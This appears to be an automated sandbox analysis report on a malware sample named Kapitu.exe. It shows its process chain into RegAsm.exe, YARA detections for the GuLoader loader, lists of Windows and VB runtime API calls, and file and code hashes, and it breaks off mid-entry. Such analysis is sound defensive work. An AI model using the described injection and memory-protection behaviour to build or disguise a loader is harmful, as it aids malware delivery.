              X-Frame-Options: SAMEORIGIN
              X-XSS-Protection: 1; mode=block
              Server: GSE
              Set-Cookie: NID=511=abKi0BWgcemcd0d8wm9mOlAU2B3arxsDTzzIYttMhyEZI6BWiC6XRhQKgWHtgX8WrOJul08K92QFhtYs9xjnosQK86HWAE8VXopjAbsMkP7rWufpF19a4IJLb_GGIG6TaDkuZEY-t6WXx_m0czyrRfhtLyX5RoUF5UVTrZ9K2D8; expires=Tue, 29-Mar-2022 13:08:50 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
              Accept-Ranges: none
              Vary: Accept-Encoding
              Connection: close
              Transfer-Encoding: chunked
              2021-09-27 13:08:50 UTC1INData Raw: 38 64 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30
              Data Ascii: 8d<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#00000
              2021-09-27 13:08:50 UTC1INData Raw: 30 22 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 3c 48 32 3e 45 72 72 6f 72 20 34 30 34 3c 2f 48 32 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 0d 0a
              Data Ascii: 0"><H1>Not Found</H1><H2>Error 404</H2></BODY></HTML>
              2021-09-27 13:08:50 UTC1INData Raw: 30 0d 0a 0d 0a
              Data Ascii: 0


              Code Manipulations

              Statistics

              CPU Usage

              Click to jump to process

              Memory Usage

              Click to jump to process

              High Level Behavior Distribution

              Click to dive into process behavior distribution

              Behavior

              Click to jump to process

              System Behavior

              Analysis Process: Kapitu.exe PID: 6732 Parent PID: 5944

              General

              Start time:15:07:55
              Start date:27/09/2021
              Path:C:\Users\user\Desktop\Kapitu.exe
              Wow64 process (32bit):true
              Commandline:'C:\Users\user\Desktop\Kapitu.exe'
              Imagebase:0x400000
              File size:102400 bytes
              MD5 hash:149B6BD6B0D3DD2B0FBB111632D59FCC
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:Visual Basic
              Reputation:low

              Chronological Activities

              Analysis Process: RegAsm.exe PID: 6972 Parent PID: 6732

              General

              Start time:15:08:24
              Start date:27/09/2021
              Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
              Wow64 process (32bit):true
              Commandline:'C:\Users\user\Desktop\Kapitu.exe'
              Imagebase:0xc80000
              File size:53248 bytes
              MD5 hash:A64DACA3CFBCD039DF3EC29D3EDDD001
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.19109903808.0000000001100000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000000.18979643782.0000000001100000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000000.18969783001.0000000001100000.00000040.00000001.sdmp, Author: Joe Security
              Reputation:low

              Chronological Activities

              Analysis Process: conhost.exe PID: 6980 Parent PID: 6972

              General

              Start time:15:08:24
              Start date:27/09/2021
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff73c180000
              File size:875008 bytes
              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:low

              Chronological Activities

              Analysis Process: WerFault.exe PID: 5608 Parent PID: 6972

              General

              Start time:15:12:48
              Start date:27/09/2021
              Path:C:\Windows\SysWOW64\WerFault.exe
              Wow64 process (32bit):true
              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6972 -s 1356
              Imagebase:0x7ff79c420000
              File size:482640 bytes
              MD5 hash:40A149513D721F096DDF50C04DA2F01F
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:Visual Basic
              Reputation:low

              Chronological Activities

              Disassembly

              Code Analysis

              Reset < >

                Analysis Process: Kapitu.exe PID: 6732 Parent PID: 5944 Kapitu.exeCOMMON

                Executed Functions

                Function 004143D0, Relevance: 73.9, APIs: 40, Strings: 2, Instructions: 401COMMON
                Download Yara Rule
                APIs
                • __vbaChkstk.MSVBVM60(?,00401196), ref: 004143EE
                • #648.MSVBVM60(0000000A), ref: 00414445
                • __vbaFreeVar.MSVBVM60 ref: 00414452
                • #593.MSVBVM60(0000000A), ref: 00414471
                • __vbaFreeVar.MSVBVM60 ref: 0041447D
                • __vbaOnError.MSVBVM60(000000FF), ref: 0041448C
                • __vbaOnError.MSVBVM60(00000000), ref: 0041449B
                • #582.MSVBVM60(00000000,00000000), ref: 004144AC
                • __vbaFpR8.MSVBVM60 ref: 004144B2
                • #541.MSVBVM60(0000000A,15:15:15), ref: 004144D9
                • __vbaStrVarMove.MSVBVM60(0000000A), ref: 004144E3
                • __vbaStrMove.MSVBVM60 ref: 004144EE
                • __vbaFreeVar.MSVBVM60 ref: 004144F7
                • __vbaNew2.MSVBVM60(00414150,004162D4), ref: 00414517
                • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041413C,00000014), ref: 0041457D
                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00414160,000000D8), ref: 004145E0
                • __vbaStrMove.MSVBVM60 ref: 00414611
                • __vbaFreeObj.MSVBVM60 ref: 0041461A
                • #532.MSVBVM60(Specting7), ref: 0041462C
                • __vbaHresultCheckObj.MSVBVM60(?,?,0041403C,000006F8), ref: 00414701
                • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041400C,000002B4), ref: 00414755
                • #595.MSVBVM60(00004003,00000000,0000000A,0000000A,?), ref: 0041481B
                • __vbaFreeVarList.MSVBVM60(00000003,0000000A,0000000A,?), ref: 0041482F
                • __vbaFreeStr.MSVBVM60(00414884), ref: 00414874
                • __vbaFreeStr.MSVBVM60 ref: 0041487D
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.17008380650.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.17008341340.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.17008506922.0000000000416000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.17008529892.0000000000417000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: __vba$Free$CheckHresult$Move$Error$#532#541#582#593#595#648ChkstkListNew2
                • String ID: 15:15:15$Specting7
                • API String ID: 4146733498-3993399904
                • Opcode ID: f274ec460dbadb6b1d93657b41d762b97ca730fe61a25f82f4289d7592ed1a9d
                • Instruction ID: d38a8d83a9c1057c504a4ba25e2f9f59dac6fdf465b0b5a2e2cab0a640dfe200
                • Opcode Fuzzy Hash: f274ec460dbadb6b1d93657b41d762b97ca730fe61a25f82f4289d7592ed1a9d
                • Instruction Fuzzy Hash: F90216B4901259EFDB10DF90CE88BDDBBB4FF48304F10819AE549A72A0D7785A85CF68
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004012D4, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.17008380650.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.17008341340.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.17008506922.0000000000416000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.17008529892.0000000000417000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: #100
                • String ID: VB5!6&*
                • API String ID: 1341478452-3593831657
                • Opcode ID: 9cf2941e621a69fea955780aa94981640b67aee3367f1cc232f1084aa8b8bf91
                • Instruction ID: 7271d700640d2f78ea57597eab43cff79751428e75609dc4c0b4d2d63b27fc33
                • Opcode Fuzzy Hash: 9cf2941e621a69fea955780aa94981640b67aee3367f1cc232f1084aa8b8bf91
                • Instruction Fuzzy Hash: F101456255E7C05FD30317704C226923FB8AE4326072B40EB9885DA4B3C11D4D4AD7A2
                Uniqueness

                Uniqueness Score: -1.00%

                Non-executed Functions

                Function 00414C20, Relevance: 71.0, APIs: 47, Instructions: 452COMMON
                Download Yara Rule
                APIs
                • #713.MSVBVM60(004141AC,?,?,?,?,?,?,?,?,?,?,?,?,?,00401196), ref: 00414C68
                • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00401196), ref: 00414C73
                • __vbaStrCmp.MSVBVM60(004141B8,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00401196), ref: 00414C7F
                • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00401196), ref: 00414C92
                • __vbaRedim.MSVBVM60(00000080,00000002,?,00000002,00000001,00000012,00000000), ref: 00414CB3
                • __vbaGenerateBoundsError.MSVBVM60 ref: 00414CDB
                • __vbaGenerateBoundsError.MSVBVM60 ref: 00414CEB
                • __vbaGenerateBoundsError.MSVBVM60 ref: 00414D17
                • __vbaGenerateBoundsError.MSVBVM60 ref: 00414D21
                • __vbaGenerateBoundsError.MSVBVM60 ref: 00414D4D
                • __vbaGenerateBoundsError.MSVBVM60 ref: 00414D57
                • __vbaGenerateBoundsError.MSVBVM60 ref: 00414D83
                • __vbaGenerateBoundsError.MSVBVM60 ref: 00414D8D
                • __vbaGenerateBoundsError.MSVBVM60 ref: 00414DB9
                • __vbaGenerateBoundsError.MSVBVM60 ref: 00414DC3
                • __vbaGenerateBoundsError.MSVBVM60 ref: 00414DEF
                • __vbaGenerateBoundsError.MSVBVM60 ref: 00414DF9
                • __vbaGenerateBoundsError.MSVBVM60 ref: 00414E25
                • __vbaGenerateBoundsError.MSVBVM60 ref: 00414E2F
                • __vbaGenerateBoundsError.MSVBVM60 ref: 00414E5B
                • __vbaGenerateBoundsError.MSVBVM60 ref: 00414E65
                • __vbaGenerateBoundsError.MSVBVM60 ref: 00414E91
                • __vbaGenerateBoundsError.MSVBVM60 ref: 00414E9B
                • __vbaGenerateBoundsError.MSVBVM60 ref: 00414EC7
                • __vbaGenerateBoundsError.MSVBVM60 ref: 00414ED1
                • __vbaGenerateBoundsError.MSVBVM60 ref: 00414EFD
                • __vbaGenerateBoundsError.MSVBVM60 ref: 00414F07
                • __vbaGenerateBoundsError.MSVBVM60 ref: 00414F33
                • __vbaGenerateBoundsError.MSVBVM60 ref: 00414F3D
                • __vbaGenerateBoundsError.MSVBVM60 ref: 00414F69
                • __vbaGenerateBoundsError.MSVBVM60 ref: 00414F73
                • __vbaGenerateBoundsError.MSVBVM60 ref: 00414F9F
                • __vbaGenerateBoundsError.MSVBVM60 ref: 00414FA9
                • __vbaGenerateBoundsError.MSVBVM60 ref: 00414FD5
                • __vbaGenerateBoundsError.MSVBVM60 ref: 00414FDF
                • __vbaGenerateBoundsError.MSVBVM60 ref: 0041500B
                • __vbaGenerateBoundsError.MSVBVM60 ref: 00415015
                • __vbaGenerateBoundsError.MSVBVM60 ref: 00415041
                • __vbaGenerateBoundsError.MSVBVM60 ref: 0041504B
                • __vbaGenerateBoundsError.MSVBVM60 ref: 00415077
                • __vbaGenerateBoundsError.MSVBVM60 ref: 00415081
                • __vbaNew2.MSVBVM60(00414150,004162D4), ref: 004150A1
                • __vbaHresultCheckObj.MSVBVM60(00000000,0225004C,0041413C,00000014), ref: 004150CC
                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00414160,00000078), ref: 004150F4
                • __vbaFreeObj.MSVBVM60 ref: 004150F9
                • __vbaHresultCheckObj.MSVBVM60(00000000,00401180,0041400C,00000254), ref: 00415122
                • __vbaAryDestruct.MSVBVM60(00000000,?,0041514B), ref: 00415144
                Memory Dump Source
                • Source File: 00000001.00000002.17008380650.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.17008341340.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.17008506922.0000000000416000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.17008529892.0000000000417000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: __vba$BoundsErrorGenerate$CheckHresult$Free$#713DestructMoveNew2Redim
                • String ID:
                • API String ID: 58225848-0
                • Opcode ID: 12e3227d6a4245a3af32bab2ccfd400967f4b750acd3c39f084afda1e9163b3e
                • Instruction ID: fc363acd393d5aa022fa2f9ab18c7f4ca54b23b91a68f0f2775528b7a9f9143f
                • Opcode Fuzzy Hash: 12e3227d6a4245a3af32bab2ccfd400967f4b750acd3c39f084afda1e9163b3e
                • Instruction Fuzzy Hash: 80024A35A0021ACBCB24DFA4C5919FAFBB5BF84314F21416AC9016B790D775ACC7CBA9
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00414A60, Relevance: 16.6, APIs: 11, Instructions: 128COMMON
                Download Yara Rule
                APIs
                • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041400C,00000114), ref: 00414ABD
                • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041400C,00000110), ref: 00414AE6
                • #554.MSVBVM60 ref: 00414AF2
                • __vbaNew2.MSVBVM60(00414150,004162D4), ref: 00414B0A
                • __vbaHresultCheckObj.MSVBVM60(00000000,0225004C,0041413C,00000014), ref: 00414B2F
                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00414160,000000C0), ref: 00414B55
                • __vbaFreeObj.MSVBVM60 ref: 00414B5A
                • __vbaNew2.MSVBVM60(00414150,004162D4), ref: 00414B72
                • __vbaHresultCheckObj.MSVBVM60(00000000,0225004C,0041413C,00000034), ref: 00414BBC
                • __vbaObjSet.MSVBVM60(?,?), ref: 00414BCD
                • __vbaFreeObj.MSVBVM60(00414BF5), ref: 00414BEE
                Memory Dump Source
                • Source File: 00000001.00000002.17008380650.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.17008341340.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.17008506922.0000000000416000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.17008529892.0000000000417000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: __vba$CheckHresult$FreeNew2$#554
                • String ID:
                • API String ID: 420915087-0
                • Opcode ID: 52d278714c7fb6cf720ae38533a1197d1ce178b9656d84bca0fb7beab39a632c
                • Instruction ID: c6a47f743c172568fe8464088fbbb3d69f298df89f334b5019e92ca07b500883
                • Opcode Fuzzy Hash: 52d278714c7fb6cf720ae38533a1197d1ce178b9656d84bca0fb7beab39a632c
                • Instruction Fuzzy Hash: 0241B671941214ABDB04EF94DD89FDABBB8FF58704F10446AF145B7290D374AD84CB68
                Uniqueness

                Uniqueness Score: -1.00%

                Analysis Process: RegAsm.exe PID: 6972 Parent PID: 6732 RegAsm.exeCOMMON

                Executed Functions

                Function 0110F7DC, Relevance: 16.9, APIs: 1, Strings: 8, Instructions: 1180COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.19109903808.0000000001100000.00000040.00000001.sdmp, Offset: 01100000, based on PE: false
                Yara matches
                Similarity
                • API ID:
                • String ID: <mY$Y]y$]~hZ$cyJ$n$%^8$-N;$}"=
                • API String ID: 0-3882904252
                • Opcode ID: b26244f33667e4886c0339384d88cdf76be4e7c2ac28b949acd09c218eca0586
                • Instruction ID: 8be3c12626b4f67afa9fe55eed5c3a089a097523ed991df2b1dea1e5869f805a
                • Opcode Fuzzy Hash: b26244f33667e4886c0339384d88cdf76be4e7c2ac28b949acd09c218eca0586
                • Instruction Fuzzy Hash: 7AA25571A0434ADFDB398E38CD957DA37B2BF95340F56812ADC899B284D3709A85CB42
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01109DB8, Relevance: 16.3, APIs: 2, Strings: 7, Instructions: 511COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.19109903808.0000000001100000.00000040.00000001.sdmp, Offset: 01100000, based on PE: false
                Yara matches
                Similarity
                • API ID: CreateFile
                • String ID: *1-T$*1-T$G^?l$H=$H=$cyJ$q~m
                • API String ID: 823142352-2207524381
                • Opcode ID: 5e1f61e6ad0b91b701dfd030c6b915a95ef2aaf2c8e4652682feb5f4fe049cb8
                • Instruction ID: 9fa1669239d440ea4788b98c0f2b1c25d89d80b16ea362d68df842d50da4f998
                • Opcode Fuzzy Hash: 5e1f61e6ad0b91b701dfd030c6b915a95ef2aaf2c8e4652682feb5f4fe049cb8
                • Instruction Fuzzy Hash: 7502CB71A0834A8FCB3E9E38DD907ED3BA2AF56364F51421EDC4A9B291D7B18541CB43
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0110AA77, Relevance: 11.7, APIs: 1, Strings: 5, Instructions: 1239COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.19109903808.0000000001100000.00000040.00000001.sdmp, Offset: 01100000, based on PE: false
                Yara matches
                Similarity
                • API ID:
                • String ID: 'xf$Y]y$]~hZ$-N;$q~m
                • API String ID: 0-2005616889
                • Opcode ID: 61b0fee129e8ab7044dc136537c97ee253ae8d1e4ec4dbf6e8a86562ce2f3c39
                • Instruction ID: 5f6960323994a77a2fc022536dd0992689ab4a8fa240f72568d621c0202134d8
                • Opcode Fuzzy Hash: 61b0fee129e8ab7044dc136537c97ee253ae8d1e4ec4dbf6e8a86562ce2f3c39
                • Instruction Fuzzy Hash: 01B24471A0434ADFDB399E38CD947EA37B2BF55350F45812EDC899B294D3708A85CB42
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01109F9D, Relevance: 1.6, APIs: 1, Instructions: 111fileCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000005.00000002.19109903808.0000000001100000.00000040.00000001.sdmp, Offset: 01100000, based on PE: false
                Yara matches
                Similarity
                • API ID: CreateFile
                • String ID:
                • API String ID: 823142352-0
                • Opcode ID: 84469eab5885088885aae564ff2fec76aead27596cc7f91fc4d388742f92d47a
                • Instruction ID: bf4d0a6ef6b70211ce1258131207ab096069c02fa8271febfcb10de8cc3b9d14
                • Opcode Fuzzy Hash: 84469eab5885088885aae564ff2fec76aead27596cc7f91fc4d388742f92d47a
                • Instruction Fuzzy Hash: C5314732B04345DFDB39AE3DD8947EA77A6AF96394F49442EDC8587250D7B04981C702
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0110F17C, Relevance: 1.5, APIs: 1, Instructions: 41nativeCOMMON
                Download Yara Rule
                APIs
                • NtProtectVirtualMemory.NTDLL(-0514B332,?,?,?,?,0110E493,-4E8C1946,011079A2,AC70B8DE), ref: 0110F248
                Memory Dump Source
                • Source File: 00000005.00000002.19109903808.0000000001100000.00000040.00000001.sdmp, Offset: 01100000, based on PE: false
                Yara matches
                Similarity
                • API ID: MemoryProtectVirtual
                • String ID:
                • API String ID: 2706961497-0
                • Opcode ID: e16e079fee7d63db083e41b42e63e074c2f2571d5c9a1b7955a42f03a9c818e8
                • Instruction ID: 66ad38e46625603da839b462cbd17710772df0e1d9c55eb9e53335efb91d6286
                • Opcode Fuzzy Hash: e16e079fee7d63db083e41b42e63e074c2f2571d5c9a1b7955a42f03a9c818e8
                • Instruction Fuzzy Hash: 45012CB47012899FDB38CE09DC94BDA72A7AFC9340F54C12DDC0987358C7759A468B15
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01100E86, Relevance: 1.7, APIs: 1, Instructions: 229COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000005.00000002.19109903808.0000000001100000.00000040.00000001.sdmp, Offset: 01100000, based on PE: false
                Yara matches
                Similarity
                • API ID: EnumWindows
                • String ID:
                • API String ID: 1129996299-0
                • Opcode ID: 3df9ce5cf742e0c0d8f7eabca1b51daa51a8a31cd42ef34800a7a615e623099c
                • Instruction ID: b700e3f50c96a40e7a105129449e7a6acfc83ed753534e42ff0c53f8255ac734
                • Opcode Fuzzy Hash: 3df9ce5cf742e0c0d8f7eabca1b51daa51a8a31cd42ef34800a7a615e623099c
                • Instruction Fuzzy Hash: 6171EE72D182C4CFC31FDF34C8593A8BBB1EF1A395B28458DE1958BA92D7714542CB92
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01100EE4, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000005.00000002.19109903808.0000000001100000.00000040.00000001.sdmp, Offset: 01100000, based on PE: false
                Yara matches
                Similarity
                • API ID: EnumWindows
                • String ID:
                • API String ID: 1129996299-0
                • Opcode ID: d5a5acdd1302536fbf53e9262825d9fb80996de864197968d477eb2ea3855b8e
                • Instruction ID: 9ecf793e9092042c8caa7ca816fb339b890f60453c90e039e3536fc5cc3c79d6
                • Opcode Fuzzy Hash: d5a5acdd1302536fbf53e9262825d9fb80996de864197968d477eb2ea3855b8e
                • Instruction Fuzzy Hash: 71010474608284CFC32CDF38C8A56E877A6EF19364F540A1DE9AA8A741DB3155528B4A
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0110CDAE, Relevance: 1.5, APIs: 1, Instructions: 33libraryCOMMON
                Download Yara Rule
                APIs
                • LoadLibraryA.KERNEL32(47563179,7C5A28D7), ref: 0110CF71
                Memory Dump Source
                • Source File: 00000005.00000002.19109903808.0000000001100000.00000040.00000001.sdmp, Offset: 01100000, based on PE: false
                Yara matches
                Similarity
                • API ID: LibraryLoad
                • String ID:
                • API String ID: 1029625771-0
                • Opcode ID: 16fbb5566daff6bc893a61f75e0da0bdb02e63291982994fed76590481de5889
                • Instruction ID: ecf8d571f0de89c5295889dccc53a7d4e2b50db560e640ad64fac047c95cf084
                • Opcode Fuzzy Hash: 16fbb5566daff6bc893a61f75e0da0bdb02e63291982994fed76590481de5889
                • Instruction Fuzzy Hash: 7701AF746443AA8BCF3D9F299954BFE37A2BF09754F00426DEC2DDB242C7705A048B85
                Uniqueness

                Uniqueness Score: -1.00%

                Non-executed Functions

                Function 0110E3A7, Relevance: 6.5, Strings: 4, Instructions: 1484COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.19109903808.0000000001100000.00000040.00000001.sdmp, Offset: 01100000, based on PE: false
                Yara matches
                Similarity
                • API ID: MemoryProtectVirtual
                • String ID: Y]y$]~hZ$cyJ$-N;
                • API String ID: 2706961497-3217645269
                • Opcode ID: f9b71dcfb4f1a1bd50e1c232e534fc0f38243c0976b26f5cfe5dca0194b1e084
                • Instruction ID: 715eb33f5bb6fe417ade90a0c91678e7b0e86e0c43ad17cf8f4b5aa4ac5d43e1
                • Opcode Fuzzy Hash: f9b71dcfb4f1a1bd50e1c232e534fc0f38243c0976b26f5cfe5dca0194b1e084
                • Instruction Fuzzy Hash: A9D24971A0838ADFDF399F38CD947DA7BA2AF56350F45812ECC898B295D3708645CB12
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01108FCA, Relevance: 6.0, Strings: 4, Instructions: 985COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.19109903808.0000000001100000.00000040.00000001.sdmp, Offset: 01100000, based on PE: false
                Yara matches
                Similarity
                • API ID:
                • String ID: Vv+$Y]y$]~hZ$-N;
                • API String ID: 0-289095028
                • Opcode ID: c7c2ddbd3b1f48cc86712116a85fc01f5907f8c9a5a4ee6a1a8a4794b5ccaaab
                • Instruction ID: 2e6d207cf96f6c7330ce73ba6101eb4e0428f9bfef9a5b04203f85f80578041b
                • Opcode Fuzzy Hash: c7c2ddbd3b1f48cc86712116a85fc01f5907f8c9a5a4ee6a1a8a4794b5ccaaab
                • Instruction Fuzzy Hash: 3E826671A0434A9FDB398E34CD947EA7BB2FF95340F55812EDC899B294D3708A85CB42
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0110E1B8, Relevance: 4.7, Strings: 3, Instructions: 909COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.19109903808.0000000001100000.00000040.00000001.sdmp, Offset: 01100000, based on PE: false
                Yara matches
                Similarity
                • API ID:
                • String ID: Y]y$]~hZ$-N;
                • API String ID: 0-3128308444
                • Opcode ID: ad1e7c36e2cafc0bdaabea8cb1f78654aea14d89b5db9d275af0b1ee79a5765b
                • Instruction ID: 7c4fbc66ccb9e34c447edf6970779bfcaafa2dc54e0f0f5624fe1dd6dbd105c2
                • Opcode Fuzzy Hash: ad1e7c36e2cafc0bdaabea8cb1f78654aea14d89b5db9d275af0b1ee79a5765b
                • Instruction Fuzzy Hash: AA725671A0434ADFDB398E38CD943DA77B2FF95340F56812ADC899B294D3709A81CB42
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0110DD76, Relevance: 1.4, Strings: 1, Instructions: 101COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.19109903808.0000000001100000.00000040.00000001.sdmp, Offset: 01100000, based on PE: false
                Yara matches
                Similarity
                • API ID:
                • String ID: cyJ
                • API String ID: 0-1274678379
                • Opcode ID: feb02486a419e81f43bf8d2324bb351af28e8b3c61a74e39f477266e4fb77fdf
                • Instruction ID: cd61fa31a5237486caebf365de9dd8d7589b8366481d5a67267fd9e66e17de60
                • Opcode Fuzzy Hash: feb02486a419e81f43bf8d2324bb351af28e8b3c61a74e39f477266e4fb77fdf
                • Instruction Fuzzy Hash: 6C310871605709CFCF39DDB88AA53EB37B2AF62390F45822DDC8ADA585D7744642CA03
                Uniqueness

                Uniqueness Score: -1.00%

                Function 011073F2, Relevance: .1, Instructions: 142COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.19109903808.0000000001100000.00000040.00000001.sdmp, Offset: 01100000, based on PE: false
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0a0225544f4d5cbf059343f815869d03da915f54d8d88471a92441b2e4e05fd1
                • Instruction ID: 29a3d57e99f213e71a66deaf3a1927c02ad9f34efe97c67d7b40b09cc1ec0254
                • Opcode Fuzzy Hash: 0a0225544f4d5cbf059343f815869d03da915f54d8d88471a92441b2e4e05fd1
                • Instruction Fuzzy Hash: DB51E475A447498FEB79CE29CED57D637E2BF58740F45811ACE8D8B284E3707A018B02
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01107807, Relevance: .1, Instructions: 66COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.19109903808.0000000001100000.00000040.00000001.sdmp, Offset: 01100000, based on PE: false
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0c0dee29967799a3fe64a9dca94bd6fed3870415dde6aad03530d0a186484adc
                • Instruction ID: 749c7d10931a6fa8ad9569da584f0a32612140ed276fcac2c86b84abe007ac0d
                • Opcode Fuzzy Hash: 0c0dee29967799a3fe64a9dca94bd6fed3870415dde6aad03530d0a186484adc
                • Instruction Fuzzy Hash: 21212675A45249DFE7645E388C403EB73E6AF04740F96851ADCC9DA2D4E3348584CB13
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0110D408, Relevance: .0, Instructions: 50COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.19109903808.0000000001100000.00000040.00000001.sdmp, Offset: 01100000, based on PE: false
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 532627bb337d437bb4c529cc30027b4b5b2c654fc9448befd084a2f8477a442a
                • Instruction ID: 601370543aadb0df1729daa21a7983b3974e090d7067c14456c519f8abb91eaf
                • Opcode Fuzzy Hash: 532627bb337d437bb4c529cc30027b4b5b2c654fc9448befd084a2f8477a442a
                • Instruction Fuzzy Hash: A511C275A05644CFCB29CEACD994BDD37A1EF9A360F02422ADC098B6D4D331AA42CB01
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01109717, Relevance: .0, Instructions: 8COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.19109903808.0000000001100000.00000040.00000001.sdmp, Offset: 01100000, based on PE: false
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 44202390e309ae21ad760f9fc66ffa83febc4e578202b7def74869fc104efc40
                • Instruction ID: 51c94ec96a3b809159e9e938ab4fb11186e8de11cdd8ec00b69405b553961650
                • Opcode Fuzzy Hash: 44202390e309ae21ad760f9fc66ffa83febc4e578202b7def74869fc104efc40
                • Instruction Fuzzy Hash: 38C092B62016C18FFB41DF08C691B4173B0FF11AC8B280494E483DF612D328E900CA00
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0110CD70, Relevance: .0, Instructions: 4COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.19109903808.0000000001100000.00000040.00000001.sdmp, Offset: 01100000, based on PE: false
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
                • Instruction ID: bebcbd0f18a999ce64e2d619b59837d29f74db5f3d96bd371bc818b82041d4c7
